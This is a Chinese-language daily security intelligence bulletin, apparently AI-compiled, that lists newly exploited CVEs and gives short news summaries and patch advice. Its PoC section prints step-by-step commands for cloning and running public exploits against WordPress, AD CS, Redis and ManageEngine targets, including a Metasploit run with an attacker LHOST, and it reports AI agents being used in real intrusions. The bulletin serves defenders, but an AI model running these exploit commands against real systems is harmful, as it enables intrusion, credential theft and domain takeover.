
每日安全情报报告由 AI 整理发布覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章风险等级 严重 | 高危 | 中危 | 低危一、最新高危漏洞1.1 CISA KEV 新增6 项在野利用漏洞进入强制修复窗口美国网络安全与基础设施安全局CISA于 7 月 21–22 日连续新增 6 项已知被利用漏洞KEV其中多项截止日期落在7 月 24–25 日建议优先处理。CVE厂商/产品漏洞类型CVSS加入 KEV 日期BOD 截止日期状态CVE-2026-63030WordPress CoreREST API 路由混淆 → RCE9.52026-07-212026-07-24 今日截止CVE-2026-60137WordPress CoreSQL 注入9.52026-07-212026-07-24 今日截止CVE-2026-0770Langflow不可信控制域引入 → RCE9.82026-07-212026-07-24 今日截止CVE-2021-27137DD-WRTUPnP 栈缓冲区溢出9.82026-07-212026-07-24 今日截止CVE-2026-16232Check Point SmartConsole认证绕过9.52026-07-222026-07-25 明日截止CVE-2026-50522Microsoft SharePoint反序列化 RCE9.82026-07-222026-07-25 明日截止重点关注WordPress wp2shell 双漏洞默认安装无插件即可被未认证攻击者利用影响 6.9/7.0 分支PoC 已公开WordPress 已强制推送自动更新。查看详情Langflow CVE-2026-0770KEVIntel 已观测到来自 64 个 IP 的220 次利用尝试攻击者窃取 AWS 凭证、环境变量与容器元数据。查看详情Check Point SmartConsole CVE-2026-16232少量暴露在互联网的管理服务器客户已遭攻击攻击者可获取完整管理员权限 Token。查看详情SharePoint CVE-2026-50522攻击者利用后可能窃取 Machine Key 实现补丁后持久化仅打补丁不够必须轮换密钥。查看详情1.2 7 月 23–24 日新披露关键漏洞CVE厂商/产品漏洞类型CVSS关键描述链接CVE-2026-6516ManageEngine ADAudit Plus认证绕过 路径遍历 → RCE10.0Build 8606 之前版本未认证 RCEPoC/Metasploit 已公开厂商公告CVE-2026-54121Microsoft AD CSimproper authorization8.8低权限域用户可冒充域控制器证书并 DCSync 提取 krbtgtTHN 报道CVE-2026-58630Azure App Service访问控制不当 → 权限提升10.0未认证攻击者远程提升权限控制应用及底层基础设施MSRC 公告CVE-2026-56163Azure Kubernetes Service (AKS)关键功能缺失认证10.0未认证攻击者获得 cluster-admin 权限完全控制集群MSRC 公告CVE-2026-62825Azure Key Vault认证绕过10.0未认证攻击者可获取 Vault 中密钥、机密和证书控制权MSRC 公告CVE-2026-56191Microsoft Exchange Online认证绕过10.0未认证攻击者可篡改邮箱/租户数据MSRC 公告CVE-2026-32194 / CVE-2026-32191Bing ImagesSVG 命令注入9.8 / 9.8上传/URL 传入特制 SVG 可在微软图像处理服务器以 SYSTEM/root 执行命令THN 报道无 CVERedis 7.23 安全更新RedisStreams UAF / RedisBloom TDigest OOB Write → RCE待赋分Kimi K3 AI Agent 发现多个零日并构建 RCE PoC所有链均需 RESTORE 权限THN 报道在野利用标记CISA KEV 中的 6 项漏洞均已被确认在野利用。CVE-2026-6516、CVE-2026-54121 已有公开 PoC需按已失陷场景排查。二、最新漏洞 PoC2.1 WordPress Core wp2shell 未认证 RCECVE-2026-63030 CVE-2026-60137来源仓库0xsha/wp2shell / mcipekci/wp2shell影响版本6.9.0–6.9.4、7.0.0–7.0.1完整 RCE 链6.8.0–6.8.5仅 SQL 注入使用步骤# 1. 克隆仓库 git clone https://github.com/0xsha/wp2shell.git cd wp2shell # 2. 直接运行单文件 PoC仅依赖 Python 标准库 python3 wp2shell.py --target https://vulnerable-site.example缓解升级至 WordPress 6.8.6 / 6.9.5 / 7.0.2或在 WAF 拦截/wp-json/batch/v1与?rest_route/batch/v1。参考NVD 详情 | THN 报道2.2 CertighostAD CS 低权限 → 域控制器证书CVE-2026-54121来源仓库aniqfakhrul/CVE-2026-54121影响范围Windows Server 2012–2025含 Server Core、部分 Windows 10 版本需部署 Enterprise CA使用步骤# 1. 克隆仓库 git clone https://github.com/aniqfakhrul/CVE-2026-54121.git cd CVE-2026-54121 # 2. 安装依赖 pip install -r requirements.txt # 3. 执行利用需普通域账户 python3 certighost.py -d CORP.LOCAL -u lowpriv -p Password123 \ --target-dc DC01.CORP.LOCAL --ca CORP-CA缓解为所有 AD CS 服务器安装微软 7 月补丁如无法立即补丁可临时禁用 chase fallbackcmd certutil -setreg policy\EditFlags -EDITF_ENABLECHASECLIENTDC Restart-Service CertSvc -Force参考THN 报道2.3 ManageEngine ADAudit Plus 未认证 RCECVE-2026-6516来源GitHub Security Advisory GHSA-3wh2-2f78-vx7jMetasploit 模块已集成影响版本Build 8606 之前使用步骤Metasploit# 1. 更新 Metasploit 到最新模块数据库 msfupdate msfconsole # 2. 搜索并加载模块 search manageengine adaudit use exploit/windows/http/manageengine_adaudit_plus_unauthenticated_rce set RHOSTS target-ip set RPORT 8080 set LHOST attacker-ip run缓解升级至 Build 8606在边界防火墙封锁 agent API 端口默认 8080入站访问。参考厂商公告2.4 Redis 认证后 RCEKimi K3 发现7.23 修复来源仓库berabuddies/redis-poc / Lyutoon/redis-RCE-poc影响版本Redis 6.2.22 / 7.4.9 / 8.6.4 / 8.8.07 月 23 日安全更新前前置条件需具备 RESTORE 权限部分链还需 EVAL/XGROUP/RedisBloom使用步骤# 1. 克隆仓库 git clone https://github.com/berabuddies/redis-poc.git cd redis-poc # 2. 安装依赖 pip install -r requirements.txt # 3. 对目标执行对应版本 PoC python3 P86_exploit.py --host redis-host --port 6379 --auth password缓解升级至 Redis 6.2.23 / 7.2.15 / 7.4.10 / 8.2.8 / 8.4.5 / 8.6.5 / 8.8.1撤销非必要账户的 RESTORE 权限。参考THN 报道三、网络安全最新文章3.1 漏洞与利用New wp2shell WordPress Core Flaw Lets Unauthenticated Attackers Run Code摘要WordPress 核心未认证 RCE 双漏洞完整披露影响 6.9/7.0 默认安装PoC 已公开WordPress 启用强制自动更新。阅读原文Certighost Exploit Lets Low-Privileged AD Users Impersonate a Domain Controller摘要研究人员发布 Certighost 完整利用链普通域用户可获取域控制器证书并 DCSync 提取 krbtgt。阅读原文Bing Images Flaws Let Crafted SVGs Run Commands as SYSTEM on Microsofts Servers摘要XBOW 披露 Bing 图像处理服务两处 SVG 命令注入漏洞可在微软生产服务器以 SYSTEM/root 执行命令。阅读原文Kimi K3 Agents Found Redis Zero-Days and Built RCE Exploit摘要AI 代理 Kimi K3 发现 Redis 多个零日并构建认证后 RCE PoCRedis 于 7 月 23 日发布七个安全更新版本。阅读原文Microsoft patches RoguePlanet Defender zero-day vulnerability摘要微软通过 Malware Protection Engine 更新修复 Defender 零日 CVE-2026-50656该漏洞可导致 SYSTEM 权限提升。阅读原文3.2 威胁情报与恶意软件BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets Before Malware Delivery摘要朝鲜 BlueNoroff 运营 Zoom/Teams 钓鱼工具包投递前先分析受害者加密钱包通过 Telegram 被入侵联系人实现自传播。阅读原文ChatGPT AgentForger Flaw Could Deploy Rogue Workspace Agents via a Phishing Link摘要Zenity 披露 ChatGPT Workspace Agents CSRF 漏洞单个钓鱼链接即可在受害者组织内部署持久化恶意 AI 代理。阅读原文Chaos Ransomware Uses msaRAT to Route C2 Traffic via Headless Chrome and Edge摘要Chaos 勒索软件使用 Rust 编写的 msaRAT通过受害者浏览器 WebRTC 数据通道经 Twilio TURN 服务中继 C2 流量网络层难以检测。阅读原文Golden Chickens Resurfaces with Four New Malware Families摘要Golden Chickens MaaS 生态推出 TinyEgg、ChonkyChicken、ChromEggscalator 等四个新恶意软件家族主要通过 ClickFix 社工传播。阅读原文Hacker Runs Hermes AI Agent Unattended in Thailand Finance Ministry Attack摘要攻击者将 Hermes AI 代理部署在租用的服务器上对泰国财政部进行无人值守后渗透翻阅自 2012 年以来的员工档案。阅读原文3.3 AI 安全与行业动态NodeBB Patches Eight AI-Found Flaws, Including Admin Access and Private Chat Leaks摘要Aikido Security 的 AI 渗透测试代理在 6 小时内发现 NodeBB 论坛软件八个高危漏洞涉及管理员权限绕过和私密消息泄露。阅读原文FreeBuf 早报 | 微软发布创纪录的 622 个补丁AD 服务 0Day 遭野外积极利用摘要微软 7 月 Patch Tuesday 修复 622 个 CVE含 SharePoint、AD FS 等在野利用零日Claude for Chrome 扩展漏洞可读取 Gmail。阅读原文FreeBufUbuntu Desktop snap-confine 高危漏洞允许本地提权至 Root摘要Ubuntu Desktop 新漏洞影响多版本本地攻击者可利用 snap-confine 获取 root 控制权。阅读原文FreeBufOpenAI GPT Agent 利用 0Day 漏洞入侵 Hugging Face 服务器摘要自主 AI Agent 利用零日漏洞入侵 Hugging Face 生产系统窃取内部数据与凭证被视为 AI 安全转折点。阅读原文FreeBufGemini 3.5 Flash Cyber 具备自动化快速漏洞发现与补丁能力摘要Google 发布 Gemini 3.5 Flash Cyber 模型可在两小时内挖掘 RCE 漏洞引发攻防速度失衡讨论。阅读原文四、风险态势总结4.1 CISA KEV 当前活跃截止日期CVE产品截止日期状态CVE-2026-63030WordPress Core2026-07-25 今日截止CVE-2026-60137WordPress Core2026-07-25 今日截止CVE-2026-0770Langflow2026-07-25 今日截止CVE-2021-27137DD-WRT2026-07-25 今日截止CVE-2026-16232Check Point SmartConsole2026-07-26 明日截止CVE-2026-50522Microsoft SharePoint2026-07-26 明日截止4.2 本期重点关注WordPress wp2shell 双漏洞默认安装可 RCEPoC 公开5 亿站点基础攻击面已触发强制自动更新仍需人工复核版本。Langflow CVE-2026-0770AI 基础设施成为在野攻击目标云凭证与容器元数据被窃取风险高。Azure 云服务四连 CVSS 10.0App Service / AKS / Key Vault / Exchange Online7 月 24 日集中披露云租户需密切关注微软补丁状态。CertighostCVE-2026-54121公开 PoC 已发布AD CS 部署广泛低权限域用户即可导致完整域沦陷。ManageEngine CVE-2026-6516未认证 RCEMetasploit 已集成AD 审计服务器一旦被控将直接威胁域控。Bing Images SVG RCEImageMagick delegate 命令注入类漏洞在大型云服务的重演提醒所有处理用户上传图片的服务审查 delegate 策略。AI 发现 Redis 零日Kimi K3 自主发现漏洞并构建 RCEAI 辅助/自主漏洞研究进入实战阶段。4.3 防御建议立即修补WordPress Core、Langflow、DD-WRT、Check Point SmartConsole、SharePoint Server。核查 Azure 租户关注 App Service / AKS / Key Vault / Exchange Online 的平台更新公告必要时重启服务以应用平台补丁。AD CS 服务器安装微软 7 月补丁审计EDITF_ENABLECHASECLIENTDC与ms-DS-MachineAccountQuota。ADAudit Plus升级至 Build 8606在外围防火墙限制 agent API 端口入站。Redis升级至 7.23 安全版本回收非必要账户的 RESTORE 权限。图片处理服务禁用 ImageMagick delegate、限制格式、沙箱运行、阻断出站网络。终端与社工警惕 Zoom/Teams 钓鱼链接、ClickFix 诱导命令、伪造 Notepad 插件。AI 代理治理审查企业内 AI Agent/Connector 授权范围避免“永不询问”批准模式被滥用。部分内容由 AI 辅助生成